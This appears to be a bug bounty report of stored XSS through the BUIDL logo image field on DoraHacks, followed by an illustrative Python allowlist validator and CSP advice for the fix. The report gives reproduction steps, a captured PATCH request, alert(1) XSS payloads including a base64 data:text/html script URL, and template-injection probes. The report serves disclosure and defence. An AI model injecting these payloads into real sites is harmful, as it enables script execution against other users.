Description
Hi team,
I see that the image values in the BUIDLs logo feature are not validated properly.
When an attacker creates an XSS payload and edits it into the BUIDLs logo URL, it is accepted, and the XSS is triggered when someone opens the Image tab in the Chrome or Edge browser.
Reproduction steps:
1. create or edit your BUIDL at https://dorahacks.io/home
2. Then intercept the BUIDL edit request using Burp Suite.
Sample request:
PATCH /api/hack-list/self-projects/4677/ HTTP/1.1
Host: dorahacks.io
Cookie: -
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Hackerlink-Token: 641c03db26dd56d90e1553c671fead50
Content-Length: 682
Origin: https://dorahacks.io
Referer: https://dorahacks.io/home
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
{"name":"XSSttestes","source":"Grants-","tech_trees":[0],"infrastructure_tags":[1,10,91,92],"other_infrastructures":["infra:\"><img src=/ onerror=alert(1)> {{4*4}}"],"vision":"XSS","project_description":"\"><img src=/ onerror=alert(1)> {{4*4}}","pictures":["data:text/html;base64,PHNjcmlwdD5hbGVydCgiZG9yYWhhY2tzLmlvIik8L3NjcmlwdD4K"],"contact":"11111","members":[{"email":"***@***","nickname":null,"avatar":null}],"team_description":"\"><img src=/ onerror=alert(1)> {{4*4}}","github_page":"https://github.com","demo_link":"https://demo.com","demo_video":"https://demo.com","twitter":"tetes","facebook":"https://facebook.com/testes","discord":"testes","whatsapp":null,"wechat":null}
3. Then change the "pictures" value to the XSS payload URL.
XSS payloads:
- data:text/html;base64,PHNjcmlwdD5hbGVydCgiZG9yYWhhY2tzLmlvIik8L3NjcmlwdD4K
Decoded base64 XSS payload:
- data:text/html;base64,<script>alert(1)</script>
4. After saving, open the Image tab; the XSS will be triggered.
PoC video:
- https://drive.google.com/file/d/1hbx7l77a7remCEyRqa3CJr-_gEJgwb9z/view?usp=sharing
Impact:
XSS through the BUIDL logo feature
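The root cause described above is that the "pictures" field accepts any string, including data: URLs carrying HTML. The following is an added example of the server-side check a fix would need, written here for illustration; it is not DoraHacks' own code, and the function names (validate_image_url, validate_pictures), the scheme lists and the SAMPLE_PAYLOAD are assumptions constructed to mirror the shape of the request in the report.

```python
from urllib.parse import urlsplit

# Only real web URLs may be stored as a logo; data:, javascript:, blob: and
# similar schemes are never legitimate for a user-supplied image reference.
ALLOWED_SCHEMES = {"http", "https"}
MAX_URL_LENGTH = 2048


def validate_image_url(url):
    """Return True only for an absolute http(s) URL with a host component."""
    if not isinstance(url, str):
        return False
    # Strip surrounding whitespace/newlines so the scheme check sees the real scheme.
    candidate = url.strip()
    if not candidate or len(candidate) > MAX_URL_LENGTH:
        return False
    # Reject embedded control characters; they are never part of a valid URL.
    if any(ord(ch) < 0x20 for ch in candidate):
        return False
    parts = urlsplit(candidate)
    # Scheme comparison is case-insensitive (DATA: is still data:).
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False
    # "https:///x" and scheme-relative "//host/x" are rejected as well.
    if not parts.netloc:
        return False
    return True


def validate_pictures(pictures):
    """Validate the whole 'pictures' list; return a list of error messages (empty = OK)."""
    if not isinstance(pictures, list):
        return ["pictures must be a list"]
    errors = []
    for index, url in enumerate(pictures):
        if not validate_image_url(url):
            errors.append(
                f"pictures[{index}]: only absolute http(s) URLs with a host are accepted"
            )
    return errors


# Constructed sample mirroring the fields of the PATCH body in the report
# (hypothetical values, not taken from the platform).
SAMPLE_PAYLOAD = {
    "name": "example-buidl",
    "pictures": [
        "data:text/html;base64,PHNjcmlwdD5hbGVydCgiZG9yYWhhY2tzLmlvIik8L3NjcmlwdD4K",
    ],
}


if __name__ == "__main__":
    # A PATCH handler would run this before persisting and respond 400 on errors.
    for problem in validate_pictures(SAMPLE_PAYLOAD["pictures"]):
        print("rejected:", problem)
    print("clean list ok:", validate_pictures(["https://example.com/logo.png"]) == [])
```

The validator is deliberately an allowlist (http/https with a host) rather than a denylist of bad schemes, so new scheme tricks such as upper-case or whitespace-prefixed "data:" fall through to rejection. Serving stored logos with a Content-Security-Policy that disallows inline script, and loading them only through an <img> element rather than a navigable link, is the complementary output-side defence.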